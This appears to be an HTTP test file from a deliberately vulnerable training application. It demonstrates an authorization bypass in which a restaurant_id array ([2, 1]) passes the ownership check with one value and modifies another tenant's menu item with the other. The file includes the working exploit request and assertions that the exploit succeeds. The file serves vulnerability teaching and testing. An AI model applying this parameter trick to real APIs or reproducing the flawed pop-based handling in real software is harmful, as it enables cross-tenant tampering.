# @import ../_imports.http

# =============================================================================
# VULNERABILITY: Two IDs Bypass Authorization (v405)
# =============================================================================
#
# CATEGORY: Cardinality Confusion
# SEVERITY: Critical
#
# The consume_param() function uses pop() to extract values from arrays.
# When restaurant_id is passed as an array, each call returns a different value:
#   - First pop (authorization): returns array[0] = 2 (Chum Bucket) - passes check
#   - Second pop (service layer): returns array[1] = 1 (Krusty Krab) - targets victim
#
# ATTACK SCENARIO:
#   Plankton (owns Chum Bucket, restaurant_id=2) wants to sabotage competition:
#   1. Identifies a popular Krusty Krab menu item (Krabby Patty)
#   2. Sends PATCH /menu/{krabby_patty_id} with restaurant_id: [2, 1]
#   3. Authorization check consumes "2" - matches Plankton's API key (passes)
#   4. Service layer consumes "1" - targets Krusty Krab's menu item
#   5. Krabby Patty price is changed despite Plankton not owning it!
#
# IMPACT:
#   Cross-tenant menu tampering. Attacker can modify any restaurant's menu
#   by including both their own restaurant_id (for auth) and the victim's
#   restaurant_id (for the actual operation) in a single array.
#
# STATUS: VULNERABLE in v405 (exploit succeeds)
# =============================================================================

# =============================================================================
# SETUP: Seed database and identify target menu item
# =============================================================================

### Seed the database with fresh state
# @name seed
{{
  await platform.seed();
}}
# @ucskip
# @tag menu, r04, v405, vulnerable
GET /menu

# Find the Krabby Patty - a Krusty Krab item (restaurant_id=1)
@krabby_patty_id = {{$(response).find(i => i.name === "Krabby Patty").id}}
@original_price = {{$(response).find(i => i.name === "Krabby Patty").price}}

?? js $(response).isOk() == true

# =============================================================================
# VERIFY: Target item belongs to Krusty Krab (restaurant_id=1)
# =============================================================================

### Confirm the Krabby Patty belongs to Krusty Krab
# @name verify_owner
# @forceRef seed
# @tag menu, r04, v405, vulnerable
GET /menu/{{krabby_patty_id}}

?? js $(response).isOk() == true
?? js $(response).field("restaurant_id") == 1
?? js $(response).field("name") == Krabby Patty

# =============================================================================
# EXPLOIT: Plankton bypasses authorization with array restaurant_id
# =============================================================================
#
# Plankton owns Chum Bucket (restaurant_id=2), but targets Krusty Krab item.
#
# The vulnerability is in consume_param() which uses pop() on arrays:
# 1. First call: get_trusted_restaurant_id() -> pops "2" (Chum Bucket)
# 2. Authorization check: 2 == g.restaurant_manager (2) -> passes!
# 3. Second call in repository: get_trusted_restaurant_id() -> pops "1" (Krusty Krab)
# 4. Update query uses restaurant_id=1 to scope the menu item
#
# The attacker's restaurant_id satisfies auth, but victim's is used for the query.

### Plankton uses his Chum Bucket API key with array exploit
# @name exploit
# @forceRef verify_owner
# @tag menu, r04, v405, vulnerable
PATCH /menu/{{krabby_patty_id}}
X-API-Key: {{auth.restaurant("chum_bucket")}}
Content-Type: application/json

{"restaurant_id": [2, 1], "price": 0.01}

# VULNERABLE: Exploit succeeds - wrong restaurant can edit item
?? js $(response).isOk() == true
?? js parseFloat($(response).field("price")) == 0.01

# =============================================================================
# VERIFY: Krusty Krab's item was modified by Plankton
# =============================================================================

### Confirm cross-tenant modification succeeded
# @forceRef exploit
# @tag menu, r04, v405, vulnerable
GET /menu/{{krabby_patty_id}}

# Item still belongs to Krusty Krab (restaurant_id=1)
?? js $(response).field("restaurant_id") == 1
?? js $(response).field("name") == Krabby Patty
# But price was changed by Plankton (Chum Bucket owner)!
?? js parseFloat($(response).field("price")) == 0.01
